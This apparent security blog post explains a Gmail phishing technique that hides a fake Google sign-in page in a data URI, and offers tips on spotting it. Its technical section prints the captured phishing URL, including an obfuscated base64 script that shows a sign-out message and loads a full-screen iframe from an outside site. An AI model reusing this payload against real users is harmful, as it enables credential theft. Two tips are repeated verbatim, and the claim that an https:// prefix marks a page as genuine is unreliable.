Beware! Latest Smartest and Highly Effective Gmail Phishing Technique
Gmail phishing is one of most common methods used by hackers to stealing user's password. But recently an advanced Gmail phishing attack uncovered by youtuber Tom Scott.
He said "This is the closest I've ever come to falling for a Gmail phishing attack. If it hadn't been for my high-DPI screen making the image fuzzy…"
How does this Gmail phishing attack work?
1. Attacker will send an email to your Gmail account with Malicious Email Attachments.
2. On clicking the attachments, a new tab opens up and you are asked to sign in Gmail again. Which looks like original Google’s login page.
You can identify the phishing page just look at the URL of a page, original web page start with https:// but mostly phishing page not adopting HTTPS (also known as HTTP over TLS, or Transport Layer Security)
In this attack URL starting with data:text/html,https://accounts.google.com instead of https://accounts.google.com
3. Once you complete sign-in, your account has been hacked.
4. The attackers log in to your account immediately once they get your account password.Once they have access to your account, the attacker also has full access to all your emails including sent and received at this point and may download the whole lot.
How to protect yourself from phishing attack
1. Every time when you sign in to any service, Look at the browser address bar and ensure that URL starting with https://.
2. Verify the protocol, then verify the hostname.
3. Do not click on hyperlinks or links attached in the media, facebook, whatsapp or other social networking sites. Especially when the url is shorten like: is.gd/ZsSBmY, bit.ly/2aEcPwH, goo.gl/AhPr20, bit.do/dogmail.
2. Verify the protocol, then verify the hostname.
3. Do not click on hyperlinks or links attached in the media, facebook, whatsapp or other social networking sites. Especially when the url is shorten like: is.gd/ZsSBmY, bit.ly/2aEcPwH, goo.gl/AhPr20, bit.do/dogmail.
Technical Details :
This phishing technique uses something called a ‘data URI’ to include a complete file in the browser location bar. A data URI is a base64 encoded string that represents a file. You might see in the address bar ‘data:text/html…..’ that is actually a very long string of text (base64-encoded version).
data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue <script src=data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4oYzxhPycnOmUocGFyc2VJbnQoYy9hKSkpKygoYz1jJWEpPjM1P1N0cmluZy5mcm9tQ2hhckNvZGUoYysyOSk6Yy50b1N0cmluZygzNikpfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKXtkW2UoYyldPWtbY118fGUoYyl9az1bZnVuY3Rpb24oZSl7cmV0dXJuIGRbZV19XTtlPWZ1bmN0aW9uKCl7cmV0dXJuJ1xcdysnfTtjPTF9O3doaWxlKGMtLSl7aWYoa1tjXSl7cD1wLnJlcGxhY2UobmV3IFJlZ0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSl9fXJldHVybiBwfSgnMy4yLmo9ImkgaCBrIGwgbiI7bXsoZygpe2YgMT0zLjIuOShcJzFcJyk7MS44PVwnNy94LTRcJzsxLmE9XCdiIDRcJzsxLmM9XCdcJzsyLnAoXCdCXCcpWzBdLkMoMSl9KCkpfUUoZSl7fTMuMi56Lnk9Ijw2IHM9XFwicjovL3EudC91L3cudlxcIiBvPVxcIkQ6IDA7QTogNSU7ZDo1JVxcIj48LzY+IjsnLDQxLDQxLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWNvbnwxMDB8aWZyYW1lfGltYWdlfHR5cGV8Y3JlYXRlRWxlbWVudHxyZWx8c2hvcnRjdXR8aHJlZnxoZWlnaHR8fHZhcnxmdW5jdGlvbnxoYXZlfFlvdXx0aXRsZXxiZWVufFNpZ25lZHx0cnl8b3V0fHN0eWxlfGdldEVsZW1lbnRzQnlUYWdOYW1lfHJvc2V0dGF0cmFuc2xhdGlvbnxodHRwfHNyY3x0b3B8b3VyY2xpZW50c3xodG1sfG9yZWl3bnx8b3V0ZXJIVE1MfGJvZHl8d2lkdGh8aGVhZHxhcHBlbmRDaGlsZHxib3JkZXJ8Y2F0Y2gnLnNwbGl0KCd8JyksMCx7fSkp></script>
Data URIs are composed of four parts: a prefix (data:), a MIME type indicating the type of data, an optional base64 token if non-textual, and the data itself:
data:[<mediatype>][;base64],<data>
Source Websites
- https://www.wordfence.com/blog/2017/01/gmail-phishing-data-uri/#officialupdate
- Hacking Story : "I just got phished" http://blog.greggman.com/blog/getting-phished/
Here’s the entire actual URL: Link
RAW Paste Data
No comments: